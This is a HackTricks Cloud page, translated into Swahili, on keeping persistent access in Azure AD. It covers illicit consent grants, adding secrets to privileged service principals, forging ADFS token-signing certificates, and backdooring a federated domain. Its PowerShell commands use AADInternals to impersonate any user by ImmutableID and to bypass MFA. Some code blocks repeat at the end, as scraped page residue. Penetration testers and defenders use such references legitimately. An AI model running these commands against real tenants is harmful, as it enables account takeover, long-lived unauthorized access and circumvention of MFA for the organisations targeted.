Az - Persistence

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Kwa default, mtumiaji yeyote anaweza kujiandikisha programu katika Azure AD. Hivyo unaweza kujiandikisha programu (tu kwa ajili ya mpangilio wa lengo) inayohitaji ruhusa zenye athari kubwa kwa idhini ya admin (na kuidhinisha ikiwa wewe ni admin) - kama kutuma barua kwa niaba ya mtumiaji, usimamizi wa majukumu n.k. Hii itaturuhusu kutekeleza mashambulizi ya phishing ambayo yatakuwa na faida kubwa endapo yatakuwa na mafanikio.

Zaidi ya hayo, unaweza pia kukubali programu hiyo kwa mtumiaji wako kama njia ya kudumisha ufikiaji juu yake.

Applications and Service Principals

Kwa ruhusa za Msimamizi wa Programu, GA au jukumu la kawaida lenye ruhusa microsoft.directory/applications/credentials/update, tunaweza kuongeza akreditivu (siri au cheti) kwa programu iliyopo.

Inawezekana kulenga programu yenye ruhusa kubwa au kuongeza programu mpya yenye ruhusa kubwa.

Jukumu la kuvutia kuongeza kwenye programu litakuwa jukumu la msimamizi wa uthibitishaji wenye ruhusa kwani linaruhusu kurekebisha nenosiri la Wasimamizi wa Kimataifa.

Teknolojia hii pia inaruhusu kuzidi MFA.

$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a

Kwa uthibitisho wa msingi wa cheti

Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>

Federation - Token Signing Certificate

Kwa privileges za DA kwenye AD ya ndani, inawezekana kuunda na kuingiza vyeti vipya vya kusaini Token na vyeti vya Kufichua Token ambavyo vina muda mrefu wa uhalali. Hii itaturuhusu kuingia kama mtumiaji yeyote ambaye ImuutableID yake tunajua.

Kimbia amri iliyo hapa chini kama DA kwenye seva za ADFS kuunda vyeti vipya (nenosiri la default 'AADInternals'), viweke kwenye ADFS, zima auto rollver na anzisha huduma:

New-AADIntADFSSelfSignedCertificates

Kisha, sasisha taarifa za cheti na Azure AD:

Update-AADIntADFSFederationSettings -Domain cyberranges.io

Federation - Trusted Domain

Kwa kuwa na haki za GA kwenye mpangilio, inawezekana kuongeza kikoa kipya (lazima kiwe na uthibitisho), kuunda aina yake ya uthibitishaji kuwa ya Shirikisho na kuunda kikoa ili kuamini cheti maalum (any.sts katika amri iliyo hapa chini) na mtoaji:

# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io

# Get ImmutableID of the user that we want to impersonate. Using Msol module
Get-MsolUser | select userPrincipalName,ImmutableID

# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true

References

https://aadinternalsbackdoor.azurewebsites.net/

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousAz - Primary Refresh Token (PRT)NextAz - Device Registration

Last updated 3 days ago

$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd) Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a

# Using AADInternals ConvertTo-AADIntBackdoor -DomainName cyberranges.io # Get ImmutableID of the user that we want to impersonate. Using Msol module Get-MsolUser | select userPrincipalName,ImmutableID # Access any cloud app as the user Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true

Illicit Consent Grant

Applications and Service Principals

Federation - Token Signing Certificate

Federation - Trusted Domain

References

Illicit Consent Grant

Applications and Service Principals

Federation - Token Signing Certificate

Federation - Trusted Domain

References